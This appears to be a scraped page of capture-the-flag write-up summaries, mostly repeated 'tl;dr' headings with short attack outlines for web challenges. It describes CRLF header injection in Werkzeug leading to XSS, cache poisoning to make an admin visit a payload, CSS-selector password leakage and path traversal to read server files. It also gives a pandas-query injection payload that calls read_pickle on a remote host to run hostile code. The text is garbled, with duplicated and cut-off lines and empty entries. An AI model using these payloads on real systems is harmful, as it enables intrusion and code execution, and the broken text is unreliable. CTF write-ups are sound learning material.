tl;dr
- CRLF Injection in Headed Key in Werkzeug
headers.set
- Using CRLF Injection at
/?user=
to Get XSS at/helloworld
- Make the admin visit
/?user=<PAYLOAD>
and/helloworld
using cache poison or bug in regex(uninteded)
tl;dr
headers.set
/?user=
to Get XSS at /helloworld
/?user=<PAYLOAD>
and /helloworld
using cache poison or bug in regex(uninteded)tl;dr
/profile/
will not change the nonce tl;dr
tl;dr
tl;dr
tl;dr
tl;dr
tl;dr
- CSS injection using url forging
- leaking password using :empty
selectors
tl;dr
-Get the docker-entrypoint.sh using /static../docker-entrypoint.sh
-Get the challenge files using /static../panda/cgi-bin/search_currency.py
-Host your exploit and use x‘|@pd.read_pickle(‘http://0.0.0.0:6334/output.exploit')|‘ to execute the exploit
tl;dr